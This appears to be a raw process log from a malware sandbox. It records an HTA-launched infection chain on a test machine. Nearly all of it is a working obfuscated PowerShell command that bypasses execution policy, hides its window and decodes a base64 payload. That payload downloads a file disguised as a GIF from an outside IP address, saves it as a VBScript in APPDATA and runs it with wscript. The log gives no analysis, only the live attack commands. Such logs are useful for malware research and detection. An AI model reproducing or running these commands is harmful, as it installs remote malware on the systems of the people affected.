mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\nicethingsareworkingwithgreatthingsentiretimegivenmebest.hta
2536cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErSHell.exe -ex BYPass -nOP -w 1 -c DeVICecredenTIalDePLOyMEnt.ExE ; IEx($(ieX('[SyStEm.teXt.eNCOdIng]'+[CHAR]0x3a+[chAR]0X3a+'uTF8.GeTStRiNg([SyStEM.CoNvert]'+[Char]58+[Char]0X3a+'frombAse64StRInG('+[CHAr]0X22+'JE1pN0FFWFZkICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFcmRlRmlOSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybE1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVLbnBrWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXNuYXRDQk93eSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWhOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTElpaSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc1lxdkhCSCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZEJjdEpoZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbmZWeGtxQmkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTWk3QUVYVmQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjEzMi8zMzMvbmljZWdpcmxmcmllbmR2aWRlb2VudGlyZXRpbWVvbmJlc3R0aGluZ3N0b2JlLmdJRiIsIiRFTnY6QVBQREFUQVxuaWNlZ2lybGZyaWVuZHZpZGVvZW50aXJldGltZW9uYmVzdHRoaW5nc3RvYi52YnMiLDAsMCk7U3RhclQtU0xFRVAoMyk7SW52T0tlLUV4UFJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxuaWNlZ2lybGZyaWVuZHZpZGVvZW50aXJldGltZW9uYmVzdHRoaW5nc3RvYi52YnMi'+[CHaR]0X22+'))')))"
2632powershell.exe POwErSHell.exe -ex BYPass -nOP -w 1 -c DeVICecredenTIalDePLOyMEnt.ExE ; IEx($(ieX('[SyStEm.teXt.eNCOdIng]'+[CHAR]0x3a+[chAR]0X3a+'uTF8.GeTStRiNg([SyStEM.CoNvert]'+[Char]58+[Char]0X3a+'frombAse64StRInG('+[CHAr]0X22+'JE1pN0FFWFZkICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFcmRlRmlOSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybE1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVLbnBrWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXNuYXRDQk93eSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWhOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTElpaSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc1lxdkhCSCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZEJjdEpoZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbmZWeGtxQmkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTWk3QUVYVmQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjEzMi8zMzMvbmljZWdpcmxmcmllbmR2aWRlb2VudGlyZXRpbWVvbmJlc3R0aGluZ3N0b2JlLmdJRiIsIiRFTnY6QVBQREFUQVxuaWNlZ2lybGZyaWVuZHZpZGVvZW50aXJldGltZW9uYmVzdHRoaW5nc3RvYi52YnMiLDAsMCk7U3RhclQtU0xFRVAoMyk7SW52T0tlLUV4UFJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxuaWNlZ2lybGZyaWVuZHZpZGVvZW50aXJldGltZW9uYmVzdHRoaW5nc3RvYi52YnMi'+[CHaR]0X22+'))')))"
2720csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\wxt848r0.cmdline"
2836cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESFA6E.tmp" "c:\Users\test22\AppData\Local\Temp\CSCFA5D.tmp"
2892wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Roaming\nicegirlfriendvideoentiretimeonbestthingstob.vbs"
2972